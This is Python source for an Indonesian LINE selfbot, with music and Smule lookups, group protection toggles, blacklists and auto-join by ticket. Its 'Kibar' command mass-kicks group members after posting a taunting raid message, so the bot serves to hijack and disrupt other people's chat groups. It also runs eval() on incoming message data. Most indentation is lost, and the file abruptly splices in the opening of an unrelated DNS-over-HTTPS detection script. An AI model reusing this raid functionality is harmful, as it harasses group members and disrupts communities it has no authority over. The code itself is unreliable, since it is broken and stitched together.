"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Rating : " + str(vid.rating),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#800000",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "YOUTUBE",
"uri": search_url
}
}]
}]
}
}
}
cl.sendFlex(to, data)
cl.sendVideoWithURL(msg.to, me)
except Exception as e:
sendTextTemplate(msg.to,str(e))
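        # "Smule <handle>" lists a user's recordings from the public performances JSON;
        # "Smule <handle>-<n>" shows details of entry n and tries to fetch the media
        # through the sing.salon downloader page.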
elif text.startswith("Smule "):
if msg._from in admin:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("-")
search = str(count[0])
r = requests.get("https://www.smule.com/"+search+"/performances/json")
data = json.loads(r.text)
if len(count) == 1:
no = 0
ret_ = "DAFTAR OC\n"
for aa in data["list"]:
no += 1
ret_ += "\n" + str(no) + ". " + str(aa["title"])
ret_ += "\n\nSelanjutnya ketik: smule {}-nomor\nuntuk melihat detailnya. ".format(str(search))
sendTextTemplate(msg.to,ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["list"][num - 1]
smule = str(b["web_url"])
c = "Judul Oc: "+str(b["title"])
c += "\nPembuat: "+str(b["owner"]["handle"])
c += "\nTotal like: "+str(b["stats"]["total_loves"])+" like"
c += "\nTotal comment: "+str(b["stats"]["total_comments"])+" comment"
c += "\nStatus VIP: "+str(b["owner"]["is_vip"])
c += "\nStatus Oc: "+str(b["message"])
c += "\nCreated Oc: {}".format(b["created_at"][:10])
c += "\nDidengarkan: {}".format(b["stats"]["total_listens"])+" orang"
hasil = "Detail Record\n\n"+str(c)
dl = str(b["cover_url"])
cl.sendImageWithURL(msg.to,dl)
sendTextTemplate(msg.to, hasil, {'AGENT_NAME': ' URL Smule','AGENT_LINK': 'https://www.smule.com/{}'.format(str(b['owner']['handle'])),'AGENT_ICON': 'https://png.icons8.com/color/50/000000/speaker.png' })
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("https://sing.salon/smule-downloader/?url=https://www.smule.com{}".format(urllib.parse.quote(smule)))
data = BeautifulSoup(r.content, 'html5lib')
get = data.select("a[href*=https://www.smule.com/redir?]")[0]
title = data.findAll('h2')[0].text
imag = data.select("img[src*=https://www.smule.com/redir?]")[0]
if 'Smule.m4a' in get['download']:
sendTextTemplate(msg.to,"Type: Audio\n\nPlease wait for audio...")
cl.sendAudioWithURL(msg.to, get['href'])
else:
sendTextTemplate(msg.to,"Type: Video\n\nPlease wait for video...")
cl.sendVideoWithURL(msg.to, get['href'])
except Exception as e:
sendTextTemplate(msg.to,"DONE BOSS Q")
elif cmd.startswith("musik"):
try:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
r = requests.get("http://api.zicor.ooo/joox.php?song={}".format(str(urllib.parse.quote(urutan))))
data = r.text
data = json.loads(data)
b = data
c = str(b["title"])
d = str(b["singer"])
e = str(b["url"])
g = str(b["image"])
hasil = "Penyanyi: "+str(d)
hasil += "\nJudul : "+str(c)
data = {
"type": "flex",
"altText": "Musik",
"contents": {
"styles": {
"body": {
"backgroundColor": "#0000FF"
},
"footer": {
"backgroundColor": "#7FFF00"
}
},
"type": "bubble",
"body": {
"contents": [
{
"contents": [
{
"url": g,
"type": "image"
},
{
"type": "separator",
"color": "#F8F8FF"
},
{
"text": "INEX TEAM\n\nMP3\nSONG ALBUM",
"size": "xs",
"color": "#00FF00",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"type": "separator",
"color": "#FF0000"
},
{
"contents": [
{
"contents": [
{
"text": hasil,
"size": "sm",
"margin": "none",
"color": "#FFFF00",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": g,
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#660000",
"height": "sm",
"action": {
"type": "uri",
"label": "URL",
"uri": e
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "ORDER",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=price"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
cl.sendAudioWithURL(to,e)
except Exception as error:
sendTextTemplate(to, "error\n" + str(error))
logError(error)
#===========Protection============#
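        # Each toggle below adds/removes the current group id in the matching protect
        # list (welcome, protectqr, protectkick, protectinvite, protectjoin,
        # protectcancel); "Pro on/off" flips the qr/kick/invite/cancel lists at once.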
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Proqr ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Proqr ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Prokick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Prokick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Proinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Proinvite ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
                        protectinvite.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Projoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Projoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Procancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Procancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Pro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Pro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
if spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
elif ("Kibar" in msg.text):
if msg._from in admin:
if msg.toType == 2:
print ("[ 19 ] KICK ALL MEMBER")
_name = msg.text.replace("Kibar","")
gs = cl.getGroup(msg.to)
sendTextTemplate(msg.to,"ASSALAMUALAIKUM \nHALLOOO!!! \nSORRY ROOM KALIAN \nKEBANYAKAN ANU\nINEXTEAM DATANG\nMAU SAPU ROOM GJ\nNO COMEND \nNO BAPER \nNO BACOT \nNO DESAH \nNO SPONSOR \nNO HATTERS\nROOM OKEP \nROOM JUDI\nROOM GAJELAS\nSIAP KAMI BANTAII \n\n\n\nFUCK YOU...\nKENAPE LU PADA DIEM\nTANGKIS SU JANGAN CUMA NYIMAK\n\n\nDASAR ROOM PEA KAGAK JELAS\nSORRY BOS!!!\nGC LU MAU GUA SITA...!!!\n\n\n SALAM DARI KAMI\n🅸🅽🅴🆇🅱🅾🆃🆂\n\nHADIR DI ROOM ANDA\n\nRATA GAK RATA YANG PENTING KIBAR \nRATA KAMI SENANG\nGAKRATA TUNGGU KEDATANGAN KAMI LAGI\n\n\n SLAM KILERR\n🅸🅽🅴🆇🅱🅾🆃🆂 \n\n\nCREATOR\n\n\nhttps://line.me/R/ti/p/%40bvb1195k\nhttp://line.me/ti/p/~denjaka-inex")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
sendTextTemplate(msg.to,"Limit boss")
else:
for target in targets:
if not target in Bots:
if not target in admin:
if not target in staff:
try:
                                            wait["blacklist"][target] = True
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except Exception as error:
cl.sendMessage(msg.to, str(error))
elif ("kick " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
cl.sendMessage(msg.to, "")
                                wait["blacklist"][target] = True
cl.kickoutFromGroup(msg.to, [target])
except:
pass
elif cmd == "refresh" or text.lower() == 'fresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
sendTextTemplate(msg.to,"Berhasil di Refresh...")
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
sendTextTemplate(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
                    wait["Mentionkick"] = False
sendTextTemplate(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == '.contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
sendTextTemplate(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == '.contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
sendTextTemplate(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "r1 on" or text.lower() == 'respon1 on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
sendTextTemplate(msg.to,"Auto respon diaktifkan")
elif cmd == "r1 off" or text.lower() == 'respon1 off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
sendTextTemplate(msg.to,"Auto respon dinonaktifkan")
elif cmd == "r2 on" or text.lower() == 'respon2 on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention2"] = True
sendTextTemplate(msg.to,"Auto respon 2 diaktifkan")
elif cmd == "r2 off" or text.lower() == 'respon2 off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention2"] = False
sendTextTemplate(msg.to,"Auto respon 2 dinonaktifkan")
elif cmd == "pm on" or text.lower() == 'responpm on':
if wait["selfbot"] == True:
if msg._from in owner:
wait["arespon"] = True
sendTextTemplate(msg.to,"Auto respon pm diaktifkan")
elif cmd == "pm off" or text.lower() == 'responpm off':
if wait["selfbot"] == True:
if msg._from in owner:
wait["arespon"] = False
sendTextTemplate(msg.to,"Auto respon pm dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == '.autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
sendTextTemplate(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == '.autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
sendTextTemplate(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == '.autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
sendTextTemplate(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == '.autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
sendTextTemplate(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == '.autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
sendTextTemplate(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == '.autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
sendTextTemplate(msg.to,"Auto add dinonaktifkan")
elif cmd == "autoblock on":
if msg._from in admin:
settings["autoBlock"] = True
cl.sendMessage(to, "Berhasil mengaktifkan auto Block")
elif cmd == "autoblock off":
if msg._from in admin:
settings["autoBlock"] = False
cl.sendMessage(to, "Berhasil menonaktifkan auto Block")
elif cmd == "read on" or text.lower() == '.autoread on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = True
                    sendTextTemplate(msg.to,"Auto read diaktifkan")
elif cmd == "read off" or text.lower() == 'autoread off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = False
                    sendTextTemplate(msg.to,"Auto read dinonaktifkan")
elif cmd == "sticker on" or text.lower() == '.sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
sendTextTemplate(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == '.sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
sendTextTemplate(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == '.jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
sendTextTemplate(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == '.jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
sendTextTemplate(msg.to,"Autojoin Tiket dinonaktifkan")
elif cmd == "checkpost on":
if msg._from in owner:
settings["checkPost"] = True
sendTextTemplate(to, "Berhasil mengaktifkan check details post")
elif cmd == "checkpost off":
if msg._from in owner:
settings["checkPost"] = False
sendTextTemplate(to, "Berhasil menonaktifkan check details post")
elif cmd == "unsend on":
if msg._from in admin:
if msg.toType == 2:
wait["unsend"] = True
sendTextTemplate(msg.to, "Deteksi Unsend Diaktifkan")
elif cmd == "unsend off":
if msg._from in admin:
if msg.toType == 2:
wait["unsend"] = False
sendTextTemplate(msg.to, "Deteksi Unsend Dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
sendTextTemplate(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif cmd == "cek":
if msg._from in admin or msg._from in owner:
try:cl.inviteIntoGroup(to, ["u45882d0ead1703855dbc60d40e37bec7"]);has = "OK"
except:has = "NOT"
try:cl.kickoutFromGroup(to, ["u45882d0ead1703855dbc60d40e37bec7"]);has1 = "OK"
except:has1 = "NOT"
try:cl.cancelGroupInvitation(to, ["u45882d0ead1703855dbc60d40e37bec7"]);has2 = "OK"
except:has2 = "NOT"
if has == "OK":sil = "🅱🅰🅳🅰🅽 🆂🅴🅷🅰🆃"
else:sil = "🆃🅾🅻🅾🅽🅶 🅰🅺🆄"
if has1 == "OK":sil1 = "https://2.bp.blogspot.com/-4Yr8ckT8tgs/U_ZiZFWPewI/AAAAAAAACDo/GUcjJOT1lrE/s1600/senamsehat.gif"
else:sil1 = "https://1.bp.blogspot.com/-GhAAjmcghVc/WDQHbLNi7bI/AAAAAAAAAGg/-wIouq5Hu3EEnwdx2jr-DFN9r0Vn5f3IgCLcB/s1600/Infectieziekten%2B%25281%2529.gif"
if has2 == "OK":sil2 = "https://www.isostar.com/share/sport/img_anime_rub/1.gif"
else:sil2 = "https://www.gambaranimasi.org/data/media/511/animasi-bergerak-kubur-0025.gif"
#sendTextTemplate(to, "🄺🄸🄲🄺 : {} \n🄸🄽🅅🄸🅃🄴 : {}".format(sil1,sil))
data = {
"type": "flex",
"altText": "Cek kesehatan",
"contents": {
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#000000"
}
},
"type": "bubble",
"hero": {
"type": "image",
"url": "{}".format(sil1),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
},
"body": {
"contents": [
{
"contents": [
{
"url": "{}".format(sil2),
"type": "image"
},
],
"type": "box",
"spacing": "sm",
"layout": "vertical"
},
{
"type": "separator",
"color": "#ECF0F1"
},
{
"contents": [
{
"text": "{}".format(sil),
"size": "md",
"align": "center",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
}
}
cl.sendFlex(to, data)
elif (".Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
sendTextTemplate(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
                            wait["blacklist"][target] = True
sendTextTemplate(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
sendTextTemplate(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == '.ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == '.cb':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
sendTextTemplate(msg.to,"☠•➤Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
sendTextTemplate3(msg.to,"☠•➤Blacklist User\n\n"+ma+"\nTotal☠•➤「%s」☠•➤Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == '.talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
sendTextTemplate(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
sendTextTemplate(msg.to,"Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "cban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
                    mc = "「%i」User Blacklist" % len(wait["blacklist"])
                    wait["blacklist"] = {}
                    sendTextTemplate(msg.to,"☠•➤Clear " +mc)
#===========COMMAND SET============#
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
sendTextTemplate(msg.to, "「Welcome Msg」\nWelcome Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set r1: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set r1: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
sendTextTemplate(msg.to, "「Respon Msg」\nRespon1 Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set r2: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set r2: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag2"] = spl
sendTextTemplate(msg.to, "「Respon Msg」\nRespon 2 Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set pm: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pm: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Responpm"] = spl
sendTextTemplate(msg.to, "「Respon Msg」\nRespon Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set autojoin: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set autojoin: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Msg join")
else:
wait["autoJoinMessage"] = spl
sendTextTemplate(msg.to, "「Msg autojoin」\nMsg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Spam")
else:
Setmain["ARmessage1"] = spl
sendTextTemplate(msg.to, "「Spam Msg」\nSpam Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
sendTextTemplate(msg.to, "「Sider Msg」\nSider Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek allrespon":
if msg._from in admin:
sendTextTemplate3(msg.to, "➤☠•Pesan add Msg mu :\n「 " + str(wait["message"])+ "\n\n➤☠•Welcome Msg mu :\n「 " + str(wait["welcome"]) + " 」\n\n➤☠•Respon 1 Msg mu :\n「 " + str(wait["Respontag"]) + " 」\n\n➤☠•Respon 2 Msg mu :\n「 " + str(wait["Respontag2"]) + " 」\n\n➤☠•Respon Msg PM mu :\n「 " + str(wait["Responpm"]) + " 」\n\n➤☠•Sider Msg mu :\n「 " + str(wait["mention"]) + " 」\n\n➤☠•Msg Auto joinmu :\n「 " + str(wait["autoJoinMessage"]) + " 」")
elif text.lower() == "cek pesan":
if msg._from in admin:
sendTextTemplate(msg.to, "「Pesan Msg」\nPesan Msg mu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
sendTextTemplate(msg.to, "「Welcome Msg」\nWelcome Msg mu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek r1":
if msg._from in admin:
sendTextTemplate(msg.to, "「Respon Msg」\nRespon 1 Msg mu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek r2":
if msg._from in admin:
sendTextTemplate(msg.to, "「Respon Msg」\nRespon 2 Msg mu :\n\n「 " + str(wait["Respontag2"]) + " 」")
elif text.lower() == "cek pm":
if msg._from in admin:
sendTextTemplate(msg.to, "「Respon MsgPm」\nRespon Msg PM mu :\n\n「 " + str(wait["Responpm"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
sendTextTemplate(msg.to, "「Spam Msg」\nSpam Msg mu :\n\n「 " + str(Setmain["ARmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
sendTextTemplate(msg.to, "「Sider Msg」\nSider Msg mu :\n\n「 " + str(wait["mention"]) + " 」")
#===========JOIN TICKET============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
                    link_re = re.compile(r'(?:line:/|line\.me/R)/ti/g/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
thread1.start()
thread1.join()
except Exception as e:
pass
doh-hunter.py
import json
import socket
import time
import sys
import configparser
import base64
import ipaddress
import random
import string
import os
from http.server import HTTPServer, BaseHTTPRequestHandler
import logging
from threading import Thread
from io import BytesIO
from parsezeeklogs import ParseZeekLogs
import pycurl
config = configparser.ConfigParser()
try:
# Get variables from the configuration file
config.read('config.txt')
general = config['General']
run_mode_1 = config['Run Mode 1']
run_mode_2 = config['Run Mode 2']
run_mode_3 = config['Run Mode 3']
logging_cfg = config['Logging']
log_level_info = {'DEBUG': logging.DEBUG,
'INFO': logging.INFO,
'WARNING': logging.WARNING,
'ERROR': logging.ERROR,
'CRITICAL': logging.CRITICAL,
}
log_level_from_config = logging_cfg.get('LOG_LEVEL')
log_level = log_level_info.get(log_level_from_config, log_level_from_config)
logging.basicConfig(level=log_level, format='%(asctime)s [%(levelname)s] %(message)s')
RUN_MODE = int(general.get('RUN_MODE'))
CHECKS_TIMEOUT = int(general.get('CHECKS_TIMEOUT'))
TAG_LIFETIME = int(general.get('TAG_LIFETIME'))
